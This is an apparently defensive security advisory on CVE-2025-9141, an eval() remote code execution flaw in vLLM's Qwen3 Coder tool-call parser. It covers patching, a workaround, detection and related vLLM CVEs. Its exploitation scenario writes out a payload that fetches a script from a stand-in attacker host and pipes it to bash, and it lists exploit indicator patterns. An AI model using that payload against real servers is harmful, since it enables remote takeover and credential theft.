If you run vLLM >=0.10.0 with Qwen3 Coder and tool calling enabled, any authenticated API user can execute arbitrary code on your inference server — patch to 0.10.1.1 immediately. As an immediate workaround, remove --enable-auto-tool-choice and --tool-call-parser qwen3_coder from your startup config. Inference servers typically run with broad internal access and hold sensitive credentials, making post-exploitation blast radius severe.
What is the risk?
High severity (CVSS 8.8). Exploitability is high: network-accessible, low complexity, requires only standard API authentication with no elevated privileges or user interaction needed. LLM inference servers commonly hold API keys, model weights, and internal network access. vLLM is a widely-deployed inference backbone across enterprise and cloud AI stacks, broadening exposure significantly.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| vLLM | pip | >= 0.10.0, < 0.10.1.1 | 0.10.1.1 |
Do you use vLLM? You're affected.
How severe is it?
What is the attack surface?
What should I do?
5 steps-
PATCH
Upgrade vllm to >=0.10.1.1 immediately on all inference nodes.
-
WORKAROUND (if patching is delayed): Remove --enable-auto-tool-choice and --tool-call-parser qwen3_coder flags from all startup configs and restart services.
-
NETWORK
Restrict vLLM API access to trusted internal clients only; never expose inference endpoints to the public internet without strong authentication and IP allowlisting.
-
DETECT
Audit API request logs for tool call parameters containing Python syntax patterns (parentheses, 'import', 'os.', 'subprocess.', '__') as exploitation indicators.
-
VERIFY
Audit all running vLLM versions with 'pip show vllm' across inference nodes.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2025-9141?
If you run vLLM >=0.10.0 with Qwen3 Coder and tool calling enabled, any authenticated API user can execute arbitrary code on your inference server — patch to 0.10.1.1 immediately. As an immediate workaround, remove --enable-auto-tool-choice and --tool-call-parser qwen3_coder from your startup config. Inference servers typically run with broad internal access and hold sensitive credentials, making post-exploitation blast radius severe.
Is CVE-2025-9141 actively exploited?
No confirmed active exploitation of CVE-2025-9141 has been reported, but organizations should still patch proactively.
How to fix CVE-2025-9141?
1. PATCH: Upgrade vllm to >=0.10.1.1 immediately on all inference nodes. 2. WORKAROUND (if patching is delayed): Remove --enable-auto-tool-choice and --tool-call-parser qwen3_coder flags from all startup configs and restart services. 3. NETWORK: Restrict vLLM API access to trusted internal clients only; never expose inference endpoints to the public internet without strong authentication and IP allowlisting. 4. DETECT: Audit API request logs for tool call parameters containing Python syntax patterns (parentheses, 'import', 'os.', 'subprocess.', '__') as exploitation indicators. 5. VERIFY: Audit all running vLLM versions with 'pip show vllm' across inference nodes.
What systems are affected by CVE-2025-9141?
This vulnerability affects the following AI/ML architecture patterns: LLM inference serving, agent frameworks, tool-enabled LLM pipelines, agentic AI platforms, multi-tenant AI API services.
What is the CVSS score for CVE-2025-9141?
CVE-2025-9141 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 4.02%.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0010.001 AI Software AML.T0040 AI Model Inference API Access AML.T0049 Exploit Public-Facing Application AML.T0050 Command and Scripting Interpreter AML.T0053 AI Agent Tool Invocation Compliance Controls Affected
What are the technical details?
Original Advisory
### Summary An unsafe deserialization vulnerability allows any authenticated user to execute arbitrary code on the server if they are able to get the model to pass the code as an argument to a tool call. ### Details vLLM's [Qwen3 Coder tool parser](https://github.com/vllm-project/vllm/blob/main/vllm/entrypoints/openai/tool_parsers/qwen3coder_tool_parser.py) contains a code execution path that uses Python's `eval()` function to parse tool call parameters. This occurs during the parameter conversion process when the parser attempts to handle unknown data types. This code path is reached when: 1. Tool calling is enabled (`--enable-auto-tool-choice`) 2. The qwen3_coder parser is specified (`--tool-call-parser qwen3_coder`) 3. The parameter type is not explicitly defined or recognized ### Impact Remote Code Execution via Python's `eval()` function.
Exploitation Scenario
An adversary with valid but low-privileged API credentials (stolen service account, malicious insider, or compromised client in a multi-tenant deployment) sends a crafted tool call request to a vLLM endpoint running Qwen3 Coder. The tool call includes a parameter with an unrecognized or ambiguous type, triggering the parser's eval() fallback path. The adversary injects a payload such as __import__('os').system('curl attacker.com/shell.sh | bash') as the parameter value. This executes on the inference server under the process owner's privileges, enabling credential theft, internal network pivoting, model weight exfiltration, or persistent backdoor installation.
Weaknesses (CWE)
CWE-502 — Deserialization of Untrusted Data: The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.
- [Architecture and Design, Implementation] If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.
- [Implementation] When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H References
Timeline
Related Vulnerabilities
CVE-2024-9053 9.8 vllm: RCE via unsafe pickle deserialization in RPC server
Same package: vllm CVE-2024-11041 9.8 vllm: RCE via unsafe pickle deserialization in MessageQueue
Same package: vllm CVE-2026-25960 9.8 vllm: SSRF allows internal network access
Same package: vllm CVE-2025-47277 9.8 vLLM: RCE via exposed TCPStore in distributed inference
Same package: vllm CVE-2025-32444 9.8 vLLM: RCE via pickle deserialization on ZeroMQ
Same package: vllm